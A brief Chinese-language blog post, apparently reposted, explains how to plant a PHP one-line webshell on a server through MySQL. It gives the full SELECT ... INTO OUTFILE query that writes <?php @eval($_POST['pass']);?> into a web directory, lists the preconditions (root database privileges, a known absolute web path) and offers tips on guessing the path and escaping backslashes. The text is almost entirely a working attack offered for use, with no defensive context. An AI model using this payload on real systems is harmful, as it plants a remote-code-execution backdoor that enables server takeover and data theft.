1. 程式人生 > >mysql寫入一句話木馬

mysql寫入一句話木馬

前提:

root許可權,知道了伺服器的web的絕對路徑,嘗試寫入一句話

mysql查詢語句執行:select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\Wamp\2.php"

注意事項:

1、絕對路徑的猜解

2、INTO OUTFILE 後面的"D:\Wamp\2.php",有的時候需要變成“D:\\Wamp\\2.php”(對反斜槓做了一次轉義)